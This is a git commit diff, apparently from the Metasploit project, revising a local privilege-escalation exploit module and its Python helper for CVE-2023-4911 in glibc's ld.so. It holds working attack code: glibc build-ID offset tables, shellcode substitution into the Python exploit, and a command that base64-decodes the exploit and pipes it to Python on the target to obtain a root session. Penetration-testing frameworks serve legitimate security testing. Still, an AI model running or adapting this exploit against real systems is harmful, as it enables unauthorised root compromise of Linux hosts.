Responded to comments from jvoisin
This commit is contained in:
parent
96241f509a
commit
b86df4820c
|
@ -58,16 +58,7 @@ TARGETS = {
|
||||||
}
|
}
|
||||||
|
|
||||||
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
||||||
BUILD_IDS = {
|
BUILD_IDS = METASPLOIT_BUILD_IDS
|
||||||
"69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
|
|
||||||
"3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
|
|
||||||
"a99db3715218b641780b04323e4ae5953d68a927": 561,
|
|
||||||
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
|
|
||||||
"61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
|
|
||||||
"9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
|
|
||||||
"e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
|
|
||||||
"956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
|
|
||||||
}
|
|
||||||
|
|
||||||
libc = cdll.LoadLibrary("libc.so.6")
|
libc = cdll.LoadLibrary("libc.so.6")
|
||||||
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
||||||
|
|
|
@ -18,8 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
prepend Msf::Exploit::Remote::AutoCheck
|
prepend Msf::Exploit::Remote::AutoCheck
|
||||||
|
|
||||||
BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6]
|
BUILD_IDS = {'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
|
||||||
|
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
|
||||||
|
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
|
||||||
|
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
|
||||||
|
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
|
||||||
|
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
|
||||||
|
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
|
||||||
|
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
|
||||||
|
}
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(
|
super(
|
||||||
update_info(
|
update_info(
|
||||||
|
@ -71,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
'DisclosureDate' => '2023-10-03',
|
'DisclosureDate' => '2023-10-03',
|
||||||
'Notes' => {
|
'Notes' => {
|
||||||
'Stability' => [ CRASH_SAFE, ],
|
'Stability' => [ CRASH_SAFE, ],
|
||||||
'SideEffects' => [ ARTIFACTS_ON_DISK, ],
|
'SideEffects' => [ ],
|
||||||
'Reliability' => [ REPEATABLE_SESSION, ]
|
'Reliability' => [ REPEATABLE_SESSION, ]
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
@ -116,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
|
|
||||||
def check_ld_so_build_id
|
def check_ld_so_build_id
|
||||||
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
|
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
|
||||||
if command_exists?('file ')
|
if command_exists?('file')
|
||||||
file_cmd_output = ''
|
file_cmd_output = ''
|
||||||
|
|
||||||
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
|
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
|
||||||
|
@ -128,14 +135,14 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
|
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
|
||||||
end
|
end
|
||||||
when 'debian'
|
when 'debian'
|
||||||
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
||||||
else
|
else
|
||||||
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
|
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
|
||||||
end
|
end
|
||||||
|
|
||||||
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
|
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
|
||||||
build_id = Regexp.last_match(1)
|
build_id = Regexp.last_match(1)
|
||||||
if BUILD_IDS.include?(build_id)
|
if BUILD_IDS.keys.include?(build_id)
|
||||||
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
|
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
|
||||||
else
|
else
|
||||||
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
|
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
|
||||||
|
@ -160,10 +167,11 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
# The python script assumes the working directory is the one we can write to.
|
# The python script assumes the working directory is the one we can write to.
|
||||||
cd(datastore['WritableDir'])
|
cd(datastore['WritableDir'])
|
||||||
shell_code = payload.encoded.unpack('H*').first
|
shell_code = payload.encoded.unpack('H*').first
|
||||||
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
|
|
||||||
|
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code).gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
|
||||||
|
|
||||||
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
|
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
|
||||||
output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})")
|
output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
|
||||||
if output.blank?
|
if output.blank?
|
||||||
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
|
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
|
||||||
else
|
else
|
||||||
|
|
Loading…
Reference in New Issue